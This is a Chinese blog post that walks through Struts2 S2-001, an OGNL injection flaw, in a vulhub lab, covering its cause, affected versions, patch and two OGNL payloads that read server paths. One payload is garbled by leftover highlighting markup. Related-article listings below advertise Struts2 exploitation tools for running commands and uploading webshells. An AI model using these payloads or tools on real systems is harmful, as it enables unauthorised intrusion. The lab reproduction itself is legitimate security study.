s2 安恒 漏洞验证工具_【Struts2命令代码执行漏洞分析系列】 S2001

最新推荐文章于 2024-05-31 18:19:08 发布
最新推荐文章于 2024-05-31 18:19:08 发布
阅读量1k 收藏
点赞数
文章标签: s2 安恒 漏洞验证工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42370320/article/details/112241699
版权
本文详细介绍了Struts2的S2-001命令代码执行漏洞,包括漏洞成因、影响范围、环境搭建、利用原理和过程。通过示例展示了如何在WebWork 2.1到Struts 2.0.8版本中,由于OGNL表达式的递归解析导致的安全问题。此外,还提到了漏洞的解决办法和防止递归执行的修改。文章末尾推荐了几款Struts2漏洞扫描和检测工具。
摘要由CSDN通过智能技术生成

b6d5a8b11c864cb1339e2783292f6f78.gif

漏洞信息:

漏洞信息页面: 

https://cwiki.apache.org/confluence/display/WW/S2-001

漏洞成因官方概述:

Remote code exploit on form validation error

漏洞影响:
WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

6964ad00d6393c3f9b7f4e2dc1c88e1d.png

环境搭建:
用vulhub靶场进行搭建,非常方便

dad153efa6329951c74bc83f00e5e037.png 

我已经搭建完成,这个图片是已经搭建完成的,使用 docker ps 命令 查看已经搭建好的靶场容器。

原理:

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}


进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value}


对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 

利用过程:
进入靶场

5ff4eda8383b2119ef59f5eddb1e302a.png 
这个漏洞的问题在于可以直接输入和直接回显
将POC粘到一个输入框,点击Submit
此后会将数据提交到后端,后端检测值是否为空,然后返回,满足漏洞前提
获取tomcat执行路径:

class="token operator">%class="token punctuation">{class="token string">"tomcatBinDir{"class="token operator"> class="token annotation punctuation">@javaclass="token punctuation">.langclass="token punctuation">.Systemclass="token annotation punctuation">@getPropertyclass="token punctuation">(class="token string">"user.dir"class="token punctuation">)class="token operator"> class="token string">"}"class="token punctuation">}

8c36fed0e56cce9c5fd2e904b440ae1a.png 

获取Web路径:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

fa9f9c657c09f64c3bf0d2dbb5458fa4.png 总结:

最后总结一下 S2-001 的一个触发条件:开启 altSyntax 功能;使用 s 标签处理表单;action 返回错误;OGNL 递归处理


值得一提的是 Struts2 官方给出了一个解决办法中提到了:从XWork 2.0.4开始,OGNL解析被更改,因此它不是递归的。因此,在上面的示例中,结果将是预期的%{1 1}。


也就是只会获取到 username 的内容,而不会再把 username 里的内容再执行一遍。

960e472c2847befd3d998f9668f54fa6.png

推荐文章++++

009e89a3766364ae011ea6c2ef70f6c9.png

*Struts2-Scan 一款全漏洞扫描利用工具

*Python编写的开源Struts2全版本漏洞检测工具

*Struts2 再爆高危漏洞S2-048 来了

981f79812a1df641bb09f79d82f68efd.png

6e9f040475c404e3142e4933e0cbb554.gif

口口子茶叶蛋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
s2 安恒 漏洞验证工具_Struts2 部分漏洞复现
weixin_39945679的博客
01-02 981
s2-061已经复现过了,低漏洞可以使用k8哥哥和安恒工具完成检测和写马,就不再做复现了,当然也可以使用漏扫去发现漏洞s2-059漏洞描述:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。影响本:Struts 2.0.0 – Struts 2.5.2...
s2 安恒 漏洞验证工具_s2-045漏洞批量检测工具
weixin_39713219的博客
12-20 492
今天晚上看老铁们在群里就这个st2-045漏洞讨论得火热,个人不太喜欢日站,本来想直接写个批量挂马的东西,但是想想还是算了,如果你有兴趣,改改也很容易,反正不关我的事测试图2017-3-8更新增加了对.do关键词的支持,并且支持任何关键词了,之前我只考虑到了.action关键词并且写死了规则,py本已经更新,win的exe未更新,需要的自行用pyinstaller打包为exe之前采用whoam...
Struts2漏洞检查工具2018
09-05
Struts2漏洞检查工具2018,带最新的漏洞检查,方便使用。目前支持一键检测Struts2漏洞
s2 安恒 漏洞验证工具_WebLogic Server高危安全漏洞预警通报
weixin_35689681的博客
12-12 242
大网安协【2020-52】 近日,大连市网络安全信息通报机制合作单位安恒公司提醒,Oracle WebLogic Server内多个产品存在安全漏洞,其中有涉及IIOP、T3协议远程代码执行的高危漏洞。2020年7月15日,Oracle官方发布了2020年7月安全更新公告,包含了其家族WebLogic Server在内的多个产品安全漏洞公告,其中有涉及IIOP、T3协议远程代码执行的高危...
struts2漏洞工具_Struts2 漏洞集合_零开始黑客入门教程
最新发布
2401_84915584的博客
05-31 704
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做
s2 安恒 漏洞验证工具_Oracle WebLogic安全漏洞预警
weixin_29935511的博客
12-13 260
1.安全公告2019年10月15日,Oracle官方发布了2019年10月安全更新公告,包含了其家族多个产品的安全漏洞公告。其中有两个Oracle WebLogic Server的高危漏洞,对应CVE编号:CVE-2019-2890和CVE-2019-2891,漏洞公告链接:https://www.oracle.com/technetwork/security-advisory/cpu...
Struts2漏洞利用工具2019 V2.3.zip
02-24
Struts2漏洞利用工具2019 V2.3. Struts2漏洞检测工具,请勿非法攻击他人网站,安恒大佬的作品
Struts2漏洞检查工具2018.rar
03-31
1. **S2-045**:这是一个远程代码执行漏洞,允许攻击者通过精心构造的HTTP请求头来执行任意代码。 2. **S2-048**:这个漏洞允许攻击者通过修改Content-Type字段来执行任意代码。 3. **S2-057**:与S2-045类似,也是...
struts漏洞检测工具
11-08
struts2 漏洞检测工具 ,快速检测struts命令执行漏洞,可批量。运行环境要求:MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037...
Struts2漏洞利用工具2017V1.8
03-09
增加最新的S2-032远程代码执行漏洞,和S2-019很相似。 参考:http://seclab.dbappsecurity.com.cn/?p=924 2015-12-01: 采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。 增加...
s2 安恒 漏洞验证工具_黑盒扫描工具简介
weixin_30327815的博客
12-29 2627
一、Web扫描1、WebInspect国外商业级。HP WebInspect 可提供快速扫描功能、广泛的安全评估范围及准确的 Web 应用程序安全扫描结果。它可以识别很多传统扫描程序检测不到的安全漏洞。利用创新的评估技术,例如同步扫描和审核 (simultaneous crawl and audit, SCA) 及并发应用程序扫描,您可以快速而准确地自动执行 Web 应用程序安全测试和 ...
Struts2漏洞检测工具2018最新
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测
Struts2漏洞检查工具2017
03-28
Struts2漏洞检测工具2017增加S2-046,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService启动权限为*权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。
Struts2漏洞检查工具2018.zip
10-08
struts2漏洞exp利用工具, 2018-08-24: 增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定本没有看到有沙盒绕过,说以,目前exp只是基于S2-045改写的,所以exp并不是所有本都能用,正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10本可以使用此exp。 2017-07-07: 增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html 2017-03-07: 增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html 2016-04-26: 增加最新的S2-032远程代码执行漏洞,和S2-019很相似。 参考:http://seclab.dbappsecurity.com.cn/?p=924 2015-12-01: 采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。 增加复杂数据包(multipart/form-data)提交方式进行漏洞利用,可绕过部分防护。可执行命令,暂时无法上传文件。 2014-11-12: 最近遇到s19这个debug模式开启导致代码执行,这个有点少,但还是有一些,为了方便大家把13本修改了一下。可以利用这个漏洞执行命令、上传shell。
struts2漏洞扫描工具
08-10
struts2远程漏洞扫描工具
s2 安恒 漏洞验证工具_WebLogic Server高危安全漏洞风险提示
weixin_36064196的博客
12-12 193
漏洞公告2020年7月15日,Oracle官方发布了2020年7月安全更新公告,包含了其家族WebLogic Server在内的多个产品安全漏洞公告,其中有涉及IIOP、T3协议远程代码执行的高危漏洞,对应CVE编号:CVE-2020-14645,相关链接参考:https://www.oracle.com/security-alerts/cpujul2020.html根据公告,漏洞存在于...
s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8增加S2-045/S2-046)
weixin_39866966的博客
12-20 920
Struts2漏洞利用工具下载(已更新V1.8)2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、2017-03-07:增加安恒信息研究员nike.zheng发现的S...
s2 安恒 漏洞验证工具_Struts2漏洞检查工具2018(最新)V2.0[带批量功能]
weixin_39894255的博客
12-20 3229
2018-08-24:增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定本没有看到有沙盒绕过,说以,目前exp只是基于S2-045改写的,所以exp并不是所有本都能用,正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10本可以使用此exp。2017-...
struts2漏洞利用工具 安恒内部
11-17
struts2漏洞利用工具安恒内部开发的一款工具,主要用于检测和利用struts2框架中的漏洞。该工具可以帮助安全研究人员和安全工程师快速、准确地发现和利用struts2框架中存在的漏洞,从而及时修复和加固系统的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值